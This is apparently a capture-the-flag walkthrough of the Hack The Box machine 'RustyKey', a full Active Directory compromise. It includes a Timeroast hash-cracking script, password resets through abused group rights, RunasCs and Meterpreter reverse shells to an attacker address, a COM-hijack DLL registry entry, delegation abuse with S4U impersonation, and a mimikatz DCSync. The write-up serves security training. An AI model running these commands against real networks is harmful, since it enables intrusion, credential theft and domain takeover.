Rusty Key Englisch

Rusty Key Englisch

https://app.hackthebox.com/machines/RustyKey

IP

10.10.11.75

Domain/Hosts

dc.rustykey.htb rustykey.htb

/etc/krb5.conf

GNU nano 8.4

/etc/krb5.conf
k[libdefaults]
default_realm = RUSTYKEY.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = yes
default_tkt_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
default_tgs_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
permitted_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96

[realms]
RUSTYKEY.HTB = {
kdc = 10.10.11.75
}

[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB

Nmap Results

User Enumeration
Note

Trotz vieler Active Directory-Umgebungen, die reine Kerberos-Authentifizierung erfordern , erlaubt

der LDAP-Server in dieser Umgebung die Anmeldung via Simple Bind mit Benutzernamen und
Passwort.
Mit folgendem Befehl konnten wir erfolgreich alle Benutzerobjekte samt userPrincipalName
abfragen:

We successfully authenticate ourselves via Simple Bind with username and password

ldapsearch -x -H ldap://10.10.11.75 -D 'rr.parker@rustykey.htb' -w '8#t5HE8L!W3A' -b

'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalName

Bloodhound Enumeartion
We request a TGT via Kerberos

getTGT.py -dc-ip 10.10.11.75 rustykey.htb/rr.parker:'8#t5HE8L!W3A'

We set the Kerberos ticket as the active session

export KRB5CCNAME=rr.parker.ccache

We are checking the active Kerberos ticket

klist

We run BloodHound with Kerberos authentication

bloodhound-python -u 'rr.parker' -p '8#t5HEL!W3A' -c All -d rustykey.htb -ns 10.10.11.75 --zip

-k

The computer ACC IT_COMPUTER3$ can add itself to the HELPDESK GROUP

The HELPDESK group can change the password of the following four users
bb.morgan
gg.anderson
dd.ali
ee.reed

MM.TURNER has AddAlowedToAct rights on DC.RUSTKEY.HTB

These 3 users can connect via evil-winrm

bb.morgan
gg.anderson
ee.reed

timeroast IT_COMPUTER3$
Info

Die Skripte hier runterladen https://github.com/SecuraBV/Timeroast

Use this command as an alternative

python3 timeroast.py 10.10.11.75 -o rustykey.hashes

Cracking the hashes

python3 timecrack.py rustykey.hashes2 /usr/share/wordlists/rockyou.txt

The password Rusty88! was found

In Bloodhound we see that RID 1125 belongs to IT_COMPUTER3$ !!!

timecrack.py
timecrack.py (modified version to fix UTF8 bug )

#!/usr/bin/env python3

"""Perform a simple dictionary attack against the output of timeroast.py. Necessary because
the NTP 'hash' format
unfortunately does not fit into Hashcat or John right now.

Not even remotely optimized, but still useful for cracking legacy default passwords (where the
password is the computer
name) or specific default passwords that are popular in an organisation.
"""

from binascii import hexlify, unhexlify

from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
from typing import TextIO, Generator, Tuple
import hashlib, sys, re

HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$'

def md4(data: bytes) -> bytes:

try:
return hashlib.new('md4', data).digest()
except ValueError:
from md4 import MD4 # Fallback to pure Python if OpenSSL has no MD4
return MD4(data).bytes()

def compute_hash(password: str, salt: bytes) -> bytes:

"""Compute a legacy NTP authenticator 'hash'."""
return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()

def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple[int, str], None, None]:
hashes = []
for line in hashfile:
line = line.strip()
if line:
m = re.match(HASH_FORMAT, line)
if not m:
print(f'ERROR: invalid hash format: {line}', file=sys.stderr)
sys.exit(1)
rid, hashval, salt = m.group('rid', 'hashval', 'salt')
hashes.append((int(rid), unhexlify(hashval), unhexlify(salt)))

for password in dictfile:

password = password.strip()
for rid, hashval, salt in hashes:
if compute_hash(password, salt) == hashval:
yield rid, password

def main():
argparser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=\
"""Perform a simple dictionary attack against the output of timeroast.py.

Not even remotely optimized, but still useful for cracking legacy default
passwords (where the password is the computer name) or specific default
passwords that are popular in an organisation.
""")

argparser.add_argument('hashes', type=FileType('r'), help='Output of timeroast.py')

argparser.add_argument('dictionary', type=lambda f: open(f, encoding='latin-1'),
help='Line-delimited password dictionary (e.g. rockyou.txt)')
args = argparser.parse_args()

crackcount = 0
for rid, password in try_crack(args.hashes, args.dictionary):
print(f'[+] Cracked RID {rid} password: {password}')
crackcount += 1

print(f'\n{crackcount} passwords recovered.')

if __name__ == '__main__':
main()

Alternative mit nxc

Start Timeroast attack

nxc smb 10.10.11.75 -M timeroast

Exploit Chain
1. bb.morgan
We request a TGT for the machine account IT-COMPUTER3$

getTGT.py -dc-ip 10.10.11.75 'rustykey.htb/IT-COMPUTER3$:Rusty88!'

We set the machine account's Kerberos ticket as default

export KRB5CCNAME=IT-COMPUTER3$.ccache

We add the machine account to the group ' HELPDESK '

bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -k add groupMember

'HELPDESK' IT-COMPUTER3$

We remove the group ' IT`` from the protected objects`

bloodyAD --host dc.rustykey.htb -k -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove

groupMember 'Protected Objects' 'IT'

We set the password of bb.morgan to a new known password

bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!'

set password bb.morgan 'pa$$w0rd'

We request a TGT for bb.morgan with the new password

getTGT.py -dc-ip 10.10.11.75 'rustykey.htb/bb.morgan:pa$$w0rd'

We set the Kerberos ticket of bb.morgan as active

export KRB5CCNAME=bb.morgan.ccache

We start a WinRM session as bb.morgan on the domain controller

evil-winrm -i dc.rustykey.htb -u bb.morgan -r rustykey.htb

User Flage 🏁
We retrieve the user.txt flag

type C:\Users\bb.morgan\Desktop\user.txt

PDF File
In bb.morgan Home Dir we find a .pdf file

The document describes that the Support Group temporarily receives extended rights such as
access to Registry KEYS etc. (it is not entirely clear what is meant)

2. ee.reed
We activate the Kerberos ticket for IT-COMPUTER3$

export KRB5CCNAME=IT-COMPUTER3$.ccache

We add IT-COMPUTER3$ to the HELPDESK group

bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -k add groupMember

'HELPDESK' IT-COMPUTER3$

We remove SUPPORT from the protected objects (*ee.reed is a member of the SUPPORT group)

bloodyAD --kerberos --dc-ip 10.10.11.75 --host dc.rustykey.htb -d rustykey.htb -u IT-

COMPUTER3$ -p 'Rusty88!' remove groupMember "CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB"
"SUPPORT"

We set a new password for the user ee.reed

bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!'

set password ee.reed 'Password123!'

An evil-winrm shell is not possible with user ee.reed ❌

evil-winrm -i dc.rustykey.htb -u ee.reed -r rustykey.htb

Important

Da wir keine evil-winrm Shell aufbauen können zu ee.reed müssen wir RunasCs.exe nutzen über
unsere vorhandene Shell mit bb.morgan

3. RunasCs.exe bzw. Zugriff auf bb.turner

We request a TGT for the machine account IT-COMPUTER3$

export KRB5CCNAME=bb.morgan.ccache

We restart a WinRM session as bb.morgan on the domain controller

evil-winrm -i dc.rustykey.htb -u bb.morgan -r rustykey.htb

We create the directory for our tools on the target system📁

mkdir C:\Tools

We change to the created tool directory 📁

cd C:\Tools

We upload RunasCs.exe to the target

upload RunasCs.exe

Start listener

nc -lvnp 4444

We use RunasCs for a reverse shell with the privileges of `ee.reed``

.\RunasCs.exe ee.reed Password123! cmd.exe -r 10.10.16.x:4444

We now have a shell as user ee.reed

bb.turner

We set up a DLL-based Meterpreter backdoor via a COM hijacking vulnerability

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.x LPORT=4444 -f dll -o rev.dll

Prepare Handler in Metasploit

msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp;

set LHOST 10.10.16.x; set LPORT 4444; exploit"

Change Dir

cd C:\Tools

Upload DLL (use bb.morgan evil-winrm shell)

upload rev.dll

Perform registry manipulation

reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"

/ve /d "C:\Tools\rev.dll" /f

After a few seconds we get a Revshell (We have to be quick, the connection breaks very quickly)

Switch to Powershell

Powershell

Set up delegation for our machine account

Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$

4. PRIVESC
We impersonate the domain admin account via S4U2Self

impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k

'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'

We export the received ticket as a Kerberos cache

export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

We run wmiexec.py to get a shell as NT/SYTEM

wmiexec.py -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'

Root Flagge
We retrieve the root.txt flag

type C:\Users\Administrator\Desktop\root.txt

Alternative DCSync via mimikatz

We set the Kerberos ticket for backupadmin

export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

We start a remote session with backupadmin via PsExec **

psexec.py -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'

We start Mimikatz (Best with bb.morgan evil-winrm shell upload )

./mimikatz.exe

We extract the administrator's NTLM hash using DCSync`

lsadump::dcsync /domain:RUSTYKEY.HTB /user:Administrator

We use the Administrator NTLM hash to generate a Kerberos ticket

impacket-getTGT 'rustykey.htb/Administrator' -hashes :HASH -dc-ip 10.10.11.75

We activate the Kerberos ticket for the Administrator

export KRB5CCNAME=Administrator.ccache

We log in as `Domain Administrator via Evil-WinRM

evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

1/1